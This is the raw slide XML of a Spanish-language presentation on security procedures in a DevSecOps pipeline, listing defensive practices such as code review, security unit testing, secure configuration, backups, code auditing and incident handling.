              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 6" descr="Lanzamiento de nuevas formaciones en Google y Splunk – Cloud Coachers">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F15A0EA-AF15-8C30-5912-88FA8A894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9129" y="2527774"/>
            <a:ext cx="1433256" cy="4335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log elhacker.NET: Snort: Sistema Detección Intrusos (NIDS)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAA5815B-9600-D2F7-8CCD-A416AB3CFA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55032" y="2409848"/>
            <a:ext cx="1110118" cy="6050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DevSecOps Security Tool &amp; Solution | Reblaze">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B096D0-5BAD-5598-A992-2D2D367893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612" y="1038181"/>
            <a:ext cx="1646345" cy="201073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C4DB12F2-537A-7694-8A89-70C14235BD44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">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91792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15C8F-01F8-C08C-8910-E7BA624D65B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FE22B63-CA0A-543C-1F79-CCDE7730BBFE}"/>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C9589B2-3ACB-64A6-E3B9-918C6548E650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="8350369" cy="1569660"/>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Implementación de procedimientos de seguridad en un escenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC61E0CC-46FE-10A7-35DB-51561424D71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A393BDEB-3950-C4F8-1BCC-216B560FBA01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378147" y="1840888"/>
            <a:ext cx="9882620"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>seguridad</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se convierte en parte integral </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>en el ciclo de vida de desarrollo de software.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Diagrama 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F51CF4-8FD8-9460-1B52-B0C200376F4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1746212815"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1067696" y="2258422"/>
          <a:ext cx="9937106" cy="36277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Gráfico 3" descr="Candado">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CCEB2AA-4394-31F0-18A2-C9F956E911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13705" y="1383688"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0EFCA80-7FB3-FF23-2AE7-C7E96AE5D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11">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769345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81B79-B4AC-97C7-39B7-4765DBF5CF6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27714C9-5B3B-A873-7294-33AE4C6D7643}"/>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734798A-458A-ED6F-C727-F91BF12B3DB2}"/>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Entornos de desarrollo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7D8025-5911-4CA6-F5A0-3D197DC2B73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8" name="Diagrama 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D0E0AC-5F28-F15F-5644-D016840704D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1255481637"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="530828" y="942209"/>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 name="Grupo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D024949D-322F-D616-5894-0672880C7278}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1264361" y="2199993"/>
            <a:ext cx="3105345" cy="1472785"/>
            <a:chOff x="0" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectángulo 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2F03EB-0133-9017-3EE3-282F7CABCA7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="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11" name="CuadroTexto 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5564305E-1D75-D8AA-A42C-4F57E88930A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="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No uso de datos reales. Solo información anónima y publica para pruebas.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Grupo 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04B0A6B2-98C8-E0B9-FAA3-53C3E1808FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4527560" y="2199993"/>
            <a:ext cx="3105345" cy="1472785"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectángulo 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA7CAA0A-FA83-1AD2-B0E6-782091996AFE}"/>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14" name="CuadroTexto 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AA00846-B34C-E929-9E0C-1CC0C767E231}"/>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dirty="0">
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Revisión de código</a:t>
              </a:r>
              <a:endParaRPr lang="es-ES" sz="1600" kern="1200" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Grupo 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20DA91CD-0DD7-4CB3-7696-CF647693BC86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7778059" y="2199993"/>
            <a:ext cx="3105345" cy="1472785"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectángulo 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BB435-14CF-F27F-5506-A4D9FDDE1CFA}"/>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17" name="CuadroTexto 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4B0BD8C-741B-2A6F-E9F9-26C887D7430C}"/>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dirty="0">
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Automatización de pruebas unitarias de control de seguridad.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Grupo 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAA832BC-DD2B-3995-6C97-99263A3D638F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2994968" y="4188569"/>
            <a:ext cx="3105345" cy="1472785"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectángulo 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71746542-8B33-32BC-1E81-191960EAEB0A}"/>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2" name="CuadroTexto 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258D66A6-85C8-166B-D624-8916FD064186}"/>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Documentación</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Grupo 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F56CD9-6761-16B2-98AF-FD4FDF32BAEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6245467" y="4188568"/>
            <a:ext cx="3105345" cy="1472785"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectángulo 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{565F8D43-4147-B1D4-FFF8-36CD778154FA}"/>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5" name="CuadroTexto 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9F0108-354C-57D2-C1E6-FF478C6B2CD2}"/>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Esquemas y diagramas de flujo.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E93CBE-2E8C-D5AB-2D97-F412BBA5BA9E}"/>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683156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B54CC-AF24-6F7E-A413-D715B2E9CDB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DF23FF5-C937-6E04-31B9-C8F436A40C64}"/>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7979442-69E3-A9BC-6453-20E3318235F0}"/>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Entornos de desarrollo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{211BDE28-FED3-DE83-88D2-97B0AF2F0AA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D5C966E5-D379-78AA-868C-E072A2A9956B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="759732" y="1494321"/>
            <a:ext cx="9505794" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Diagrama 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE175E9-A321-ADD1-57B2-8009F8403A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2643409158"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="530828" y="919721"/>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upo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB05435-1C3A-7B81-5285-DC52F10A02C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1374387" y="2348601"/>
            <a:ext cx="3105345" cy="1421139"/>
            <a:chOff x="0" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectángulo 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A009F77-CD1A-2BCE-0D2C-D1143613A745}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="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26" name="CuadroTexto 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61201E3E-4CA2-48DB-1302-FA013C7E283F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="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Imitación de entorno funcional final</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Grupo 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C89027B6-1B8F-3395-F6F8-27F03990A0E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4637586" y="2348601"/>
            <a:ext cx="3105345" cy="1421139"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectángulo 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06C21C6E-5943-83F8-A122-554C321D7CAF}"/>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9" name="CuadroTexto 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E21C235E-87E9-2243-5B51-ECFFE9DBECAC}"/>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Monitorización de nuevos cambios, revisados por dos personas al menos.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Grupo 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE3DC34-9D6F-5E12-8343-AA8BC07BACFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7888085" y="2348601"/>
            <a:ext cx="3105345" cy="1421139"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectángulo 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3F0B476-9D2E-D9B0-F608-76822A5B54D3}"/>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32" name="CuadroTexto 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45653DC4-AFBC-52EE-692B-D401E6CF05E1}"/>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dirty="0">
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Configuración segura de sistemas y servicios. Mínima exposición.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Grupo 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{972B446B-C7A0-FC21-9754-2CDDEA28F6D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3084913" y="4337177"/>
            <a:ext cx="3105345" cy="1421139"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectángulo 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43D8148B-B6D6-51F6-1D33-F7B596115D3F}"/>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35" name="CuadroTexto 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7480A002-99C1-F33F-4AAF-B78530B9E88E}"/>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Copias de seguridad, en este entorno se suelen realizar el control de seguridad.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Grupo 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1CEA3E-F458-140B-938C-B82056243CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335412" y="4337176"/>
            <a:ext cx="3105345" cy="1421139"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Rectángulo 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC9C1193-52B1-2182-C92E-3C31EB2E3297}"/>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42" name="CuadroTexto 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12591055-AAAF-156C-E33C-988EA7CBAD19}"/>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Auditoria de código</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B25C31B-2D9B-4BFF-3EEF-3A64F819D769}"/>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346848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5DAFA-38CE-7663-B6C2-7D44564CFC1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8B011B61-B737-9D3D-0484-B46920B5B2C4}"/>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46BD39E-0631-1E52-2A69-7FEA49D35F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="9500616"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Incidentes de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32827CA2-11A4-E726-3F1F-B9CF8114B750}"/>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3" name="Imagen 2" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3FD02B-59B9-DF44-B244-4D5116F4381D}"/>
